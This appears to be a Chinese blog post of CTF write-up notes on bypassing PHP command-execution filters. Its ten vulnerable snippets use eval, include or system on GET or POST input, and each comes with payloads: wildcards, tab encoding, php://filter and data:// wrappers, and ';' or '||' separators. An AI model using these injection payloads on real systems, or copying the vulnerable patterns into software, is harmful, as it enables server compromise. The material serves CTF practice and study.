web 各种绕过

最新推荐文章于 2024-05-06 13:24:12 发布
最新推荐文章于 2024-05-06 13:24:12 发布
阅读量462 收藏 9
点赞数 1
文章标签: php 服务器 dreamweaver
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/TMNOA/article/details/130050000
版权

1.

if(isset($_GET['c'])){   
$c = $_GET['c'];   
    if(!preg_match("/flag/i", $c)){      
        eval($c);   
    }   
}   
else{  
    highlight_file(__FILE__);   
}

利用函数:eval()

绕过思路:通配符绕过flag过滤

Payload1:/?c=system(“ls”); #找到flag.php

Payload2:/?c=system(“cat fla*”);

2.

if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }

}else{
    highlight_file(__FILE__);
}

利用函数:eval()

绕过思路:过滤了system,这里使用echo。flag,php过滤继续用通配符绕过。

Payload1:?c=echo `cat *`;

3.

if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }

}else{
    highlight_file(__FILE__);
}

利用函数:eval()

绕过思路:过滤了system,这里使用echo。flag,php过滤继续用通配符绕过。空格用%09绕过,cat被过滤了换成tac。

Payload1:?c=echo `tac%09*`;

4.

if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }

}

利用函数:eval()

绕过思路:过滤了system,echo,这里可以使用passthru,但是这次还过滤了括号,所以passthru也没有办法用,这里使用文件包含,通过php://filter协议进行读取文件。

Payload1: c=$nice=include$_GET["url"]?>&url=php://filter/read=convert.base64-encode/resource=flag.php

5.

if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
    }
}

利用函数:include()

绕过思路:文件包含常用攻击手法,伪协议读取文件内容

Payload1: ?c=data:text/plain,<?=system("tac fla*");?>

6.

if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
        eval($c);
    }
}

利用函数:eval()

绕过思路:过滤了数字和许多东西,但是没有过滤掉英文的括号。

print_r(scandir(‘.’)); 查看当前目录下的所有文件名 ,开始构造。 localeconv() 函数返回一包含本地数字及货币格式信息的数组,第一个值为”.”。 current() 函数返回数组中的当前元素(单元),默认取第一个值,pos是current的别名 ,读取目录文件后,发现输出的是数组,而文件名是数组中的值,下一步我们需要取出想要读取文件的数组. each() 返回数组中当前的键/值对并将数组指针向前移动一步 end() 将数组的内部指针指向最后一个单元 next() 将数组中的内部指针向前移动一位 prev() 将数组中的内部指针倒回一位 array_reverse() 以相反的元素顺序返回数组 需要知识点齐了,观察flag.php在倒数第二位,我们开始构造。#current(localeconv()) == getcwd()

Payload1: ?c=print_r(scandir(current(localeconv()))); #打印当前目录下的文件

Payload2:?c=show_source(next(array_reverse(scandir(getcwd()))));

7.

if(isset($_POST['c'])){
  $c = $_POST['c'];
if(!preg_match('/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i', $c)){
    eval("echo($c);");
  }
}

利用函数:echo

绕过思路:把数字和字母都给过滤了,这里的思路是构造system(“ls”),但是字母被过滤。没有过滤“|”,利用它构造。

8.

if(isset($_GET['c'])){
    $c=$_GET['c'];
    system($c." >/dev/null 2>&1");
}

利用函数:system()

绕过思路:这里是通过”>/dev/null 2>&1”把输出的内容不进行回显,我们通过“;”进行截断,回显出flag.

Payload1: ls;

Payload2: cat flag.php;

9.

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}

利用函数:system()

绕过思路:这里是通过”>/dev/null 2>&1”把输出的内容不进行回显,“;”也被过滤了,我们使用命令分隔符“||”进行截断。

Payload1: ls||

Payload2: tac flag.php||

10.

if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/;|cat|flag/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}

利用函数:system()

绕过思路:这里是通过”>/dev/null 2>&1”把输出的内容不进行回显,“;”也被过滤了,我们使用命令分隔符“||”进行截断,又多过滤了flag,用通配符绕过。

Payload1: ls||

Payload2: tac fla*||

TLMOA
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web安全验证码绕过
12-23
新手必备资源,视频讲解。在我看来,验证码主要是用于避免机器人操作,并确保应用程序用户真实性的一个解决方案。问题总结::方法1:通过识别我们的请求头,来识别是否真实用户,我们打开天眼查网站的时候,正常浏览器打开会有一个请求头,请求头会按顺序带上相应的参数去请求天眼查的网站,天眼查的技术工程师会头这个头进行参数验证,如果发现您发送过来的请求头参数缺少或者顺序不同或者不对,那么就可以识别出来您是爬虫来采集他的数据,不是正常的真实用户用浏览器访问的,那么就会返回到登录页面或者提示302,301等各种禁止访问的提示。
Web应用防火墙绕过技术.docx
11-24
Web应用防火墙绕过技术.docx
2024年最新[web安全-文件上传漏洞解析,及常见绕过方式]简单易懂超友好,2024年最新后台开发网络安全岗
最新发布
2401_84265650的博客
05-06 789
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
Web应用防火墙绕过技术.pdf
11-07
Web应用防火墙绕过技术.pdf
[SQL注入]CTFshow-----WEB6(空格绕过
菜鸟的博客
07-25 292
sql注入的步骤:先查表再查字段后查数据 输入万能密码 1' #抓包发现报错 去掉之后发现正常,这我想到了空格绕过/**/ 万能登陆密码登录 检测回显位置—得到回显位为2 查表,得表名flag,user 构造语句:select/**/1,group_concat(table_name),3/**/from/**/information_schema.tables/**/where/**/table_schema=database() 查字段/列名,得列名’flag' 查数据 ...
CTFSHOW WEB入门 命令执行 web29-48
sinat_41572027的博客
07-09 1799
CTFSHOW WEB入门 命令执行 web29-48
常见php函数绕过
huangyongkang666的博客
03-31 4095
PHP常见函数介绍 1. is_numeric() 函数 作用:检测变量是否为数字或数字字符串。 PHP 版本要求:PHP 4, PHP 5, PHP 7 is_numeric函数对于空字符%00,无论是%00放在前后都可以判断为非数值,而%20空格字符只能放在数值后 绕过: ?what=1' ?what=1, ?what=1%00 2.isset函数 **作用:**检测变量是否设置 格式:bool isset ( mixed var [, mixed var [, …]] ) 返回值: 若变量不存在则返
[web安全-文件上传漏洞解析,及常见绕过方式]简单易懂超友好
m0_73033023的博客
04-20 2603
有时候服务器会对上传上去的图片进行二次渲染,生成一张新的图片,从而过滤掉webshell脚本,这时只需要将渲染后的图片与渲染前的图片进行对比,查看二者相同的地方,也就是渲染未改动的地方,在此处插入webshell脚本即可,网上推荐用gif图片。如果程序里面存在这种漏洞,那么恶意攻击者可以直接向你的服务器上传一个 webshell( 又称 ASP 木马、PHP 木马、JAVA木马等即利用服务器端的文件操作语句写成的动态网页,可以用来编辑你服务器上的文件 ),从而控制你的网站。
命令执行绕过技巧
菜鸟-传奇
01-21 1996
命令执行绕过技巧 参考:https://blog.csdn.net/weixin_39190897/article/details/116247765 参考:https://blog.csdn.net/solitudi/article/details/109837640 正则过滤 参考:https://www.runoob.com/php/php-preg_match.html 参考:https...
记录CTF命令执行练习中遇到的几道题(一些PHP命令过滤的绕过方法)
weixin_40103894的博客
10-01 1555
【代码】记录CTF命令执行练习中遇到的几道题(一些PHP命令过滤的绕过方法)
CTFshow web(29-51) 命令执行
qq_37561898的博客
01-21 898
CTF,ctfshow,命令执行
Web应用安全:使用SQL注入绕过认证实验.doc
06-17
本实验使用SQL注入绕过认证,其中包含注释符绕过、大小写绕过、特殊编码绕过、内联注释绕过等方式。 三、实验环境 1、Windows 10 2、MySQL 四、实验步骤 SQL注入绕过 1.1注释符绕过 常用注释符:-- , /**/, # 验证:...
绕过https认证工具类
12-14
绕过https认证工具类,通过该工具类,可以绕过htts需要认证的环节,针对weblogic服务器有好的效果,亲测有效,绕过https认证工具类,通过该工具类,可以绕过htts需要认证的环节,针对weblogic服务器有好的效果,亲测...
[ 常见漏洞篇 ]常见web漏洞总结------XSS跨站脚本漏洞
qq_51577576的博客
12-07 3874
本文简单的总结了一下XSS的知识点 主要是从面试的角度来总结的 如果想从事安全方向,那么这些基本的漏洞都是需要掌握的 目录 一、XSS形成原因: 二、XSS分类: 1. 反射型XSS 2. 存储型XSS 3. DOM型XSS 1. 被攻击对象的不同 2. 解析位置不同 3. 存储时间不同 三、XXS防御: 1. 输入过滤 2. 输出转义 四、xxs漏洞的利用 1. 测试流程 2. 利用方式: 五、xxs的攻击流程 1. 存储型: ​2. 反射型: 五、...
[SQL注入]CTFSHOW-----WEB6(空格绕过
Y4tacker的博客
08-05 6036
首先,通过抓包发现这个报错 去掉空格后恢复正常,因此我们得想到用/**/绕过空格 万能登陆密码登录 检测回显位置—得到回显位为2 查表名 查列名 爆数据
Web常用编码以及攻击绕过笔记
gc_msc的博客
07-25 5277
一、URL编码 形式:“%”加上ASCII码(先将字符转换为两位ASCII码,再转为16进制),其中加号“+”在URL编码中和“%20”表示一样,均为空格。 当遇到非ASCII码表示的字符时,如中文,浏览器或通过编写URLEncode,根据UTF-8、GBK等编码16进制形式,进行转换。如“春”的UTF-8编码为E6 98 A5,因此其在支持UTF-8的情况下,URL编码为%E6%98%A5。
CTFshow——命令执行
lee_maple的博客
04-23 5531
CTFshow——命令执行 Web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 可以看到,flag已经被过滤掉,先查看目录 我们可以使用通配符绕过flag的过滤 Web30 <?php
CTF 总结02:preg_match()绕过
热门推荐
weixin_42789937的博客
01-18 1万+
preg_match()绕过,小白总结,修改过一次,后期会根据做题经历有所增补~
ctf php 字符串 过滤,ctfshow命令执行(50)与常见过滤的思考
weixin_39667041的博客
03-25 2509
源码:if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){system($c." >/dev/null 2>&1")...
web安全技术类型绕过
06-08
以下是一些可能会被攻击者利用以绕过 Web 安全技术的常见类型: 1. SQL 注入绕过:攻击者可能会使用各种技术,例如 URL 编码、HTML 编码、Unicode 编码等,来绕过 SQL 注入防御机制,从而执行恶意 SQL 命令。 2. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值